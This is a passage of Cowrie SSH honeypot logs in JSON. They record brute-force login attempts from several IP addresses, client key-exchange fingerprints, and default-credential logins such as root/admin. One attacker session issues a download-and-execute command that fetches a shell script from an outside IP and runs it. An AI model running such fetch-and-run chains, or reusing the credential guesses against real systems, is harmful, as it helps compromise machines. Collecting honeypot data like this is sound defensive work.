a-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.583258Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.620905Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.621636Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.640651Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.642454Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40852,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2533b0eb0a","protocol":"ssh","message":"New connection: 212.227.125.160:40852 (1.2.3.4:22) [session: 7e2533b0eb0a]","sensor":"my-vps","timestamp":"2025-08-26T22:07:14.851270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:14.852217Z","src_ip":"212.227.125.160","session":"7e2533b0eb0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:14.908915Z","src_ip":"212.227.125.160","session":"7e2533b0eb0a"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:15.068735Z","src_ip":"212.227.125.160","session":"7e2533b0eb0a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:16.150453Z","src_ip":"212.227.125.160","session":"7e2533b0eb0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46250,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c739e1f204","protocol":"ssh","message":"New connection: 212.227.235.229:46250 (1.2.3.4:22) [session: f3c739e1f204]","sensor":"my-vps","timestamp":"2025-08-26T22:07:19.913197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:07:19.913953Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:07:20.020864Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nickels","message":"login attempt [admin/nickels] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:20.532153Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36248,"dst_ip":"1.2.3.4","dst_port":22,"session":"7db1a0f687a8","protocol":"ssh","message":"New connection: 212.227.125.160:36248 (1.2.3.4:22) [session: 7db1a0f687a8]","sensor":"my-vps","timestamp":"2025-08-26T22:07:20.855038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:20.886384Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:20.929083Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:07:21.172365Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:07:21.698099Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:07:21.698884Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nfy.irf","message":"login attempt [admin/nfy.irf] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:21.700720Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:21.750495Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:21.751633Z","src_ip":"212.227.125.160","session":"7db1a0f687a8"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:22.564384Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.login.failed","username":"admin","password":"naples","message":"login attempt [admin/naples] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:22.809355Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nacked","message":"login attempt [admin/nacked] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:23.919306Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.login.failed","username":"admin","password":"mystical","message":"login attempt [admin/mystical] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:25.029053Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:26.139776Z","src_ip":"212.227.235.229","session":"f3c739e1f204"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59868,"dst_ip":"1.2.3.4","dst_port":22,"session":"27bf5400742c","protocol":"ssh","message":"New connection: 212.227.125.160:59868 (1.2.3.4:22) [session: 27bf5400742c]","sensor":"my-vps","timestamp":"2025-08-26T22:07:26.745012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:26.746206Z","src_ip":"212.227.125.160","session":"27bf5400742c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:26.818091Z","src_ip":"212.227.125.160","session":"27bf5400742c"}
{"eventid":"cowrie.login.failed","username":"newuser","password":"newuser","message":"login attempt [newuser/newuser] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:27.058307Z","src_ip":"212.227.125.160","session":"27bf5400742c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:28.227703Z","src_ip":"212.227.125.160","session":"27bf5400742c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55256,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f08fa4a3104","protocol":"ssh","message":"New connection: 212.227.125.160:55256 (1.2.3.4:22) [session: 2f08fa4a3104]","sensor":"my-vps","timestamp":"2025-08-26T22:07:32.798894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:32.802329Z","src_ip":"212.227.125.160","session":"2f08fa4a3104"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:32.856568Z","src_ip":"212.227.125.160","session":"2f08fa4a3104"}
{"eventid":"cowrie.login.failed","username":"odoo15","password":"odoo15","message":"login attempt [odoo15/odoo15] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:33.032263Z","src_ip":"212.227.125.160","session":"2f08fa4a3104"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:34.081469Z","src_ip":"212.227.125.160","session":"2f08fa4a3104"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.231","src_port":49244,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3a2b47ec0b","protocol":"ssh","message":"New connection: 176.65.149.231:49244 (1.2.3.4:22) [session: fe3a2b47ec0b]","sensor":"my-vps","timestamp":"2025-08-26T22:07:37.892861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:37.893776Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:37.918316Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.068497Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:07:38.143504Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.144244Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.173172Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.199786Z","src_ip":"176.65.149.231","session":"fe3a2b47ec0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50646,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa1ecd0b0f4b","protocol":"ssh","message":"New connection: 212.227.125.160:50646 (1.2.3.4:22) [session: fa1ecd0b0f4b]","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.545091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.566831Z","src_ip":"212.227.125.160","session":"fa1ecd0b0f4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.595120Z","src_ip":"212.227.125.160","session":"fa1ecd0b0f4b"}
{"eventid":"cowrie.login.failed","username":"backup","password":"backup","message":"login attempt [backup/backup] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:38.814042Z","src_ip":"212.227.125.160","session":"fa1ecd0b0f4b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:39.917654Z","src_ip":"212.227.125.160","session":"fa1ecd0b0f4b"}
